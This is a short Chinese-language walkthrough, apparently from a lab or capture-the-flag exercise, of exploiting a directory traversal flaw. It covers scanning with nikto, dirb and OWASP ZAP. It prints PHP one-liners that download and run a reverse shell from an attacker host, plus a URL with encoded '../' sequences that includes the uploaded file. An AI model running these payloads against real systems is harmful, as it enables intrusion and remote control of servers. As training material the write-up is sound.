目录遍历漏洞简介
信息探测
信息探测与之前的操作一样,可以看到了开放了http80端口可以,尝试使用更加高级的方法进行扫描,其余的端口也可以尝试,看看是否有关键信息。
使用了nikto 以及dirb进行探测。我们尝试打开一些敏感信息。
之后打开,我们可以看到一个登陆输入密码的地方,这里可能存在漏洞,可以进行攻击。
漏洞扫描
使用owasp-zap
从扫描结果中可以看到,的确存在一个路径遍历的高危漏洞。
打开对应的URL
分析漏洞扫描结果
上传webshell
利用自带的反弹shell进行攻击。
记得修改对应的信息。IP以及监听端口号。
上传shell。
<?php system("cd /tmp;wget http://192.168.56.104/shell.php; chmod +x shell.php;php shell.php");?>
<?php system("cd /tmp; wget http://192.168.56.104:8000/shell.php;chmod +x shell.php;php shell.php");?>
再次登陆对应的网址,修改后面的信息。
http://192.168.56.102/view.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr/databases/shell.php
开启对应的服务,以及监听。
python -m "SimpleHTTPServer"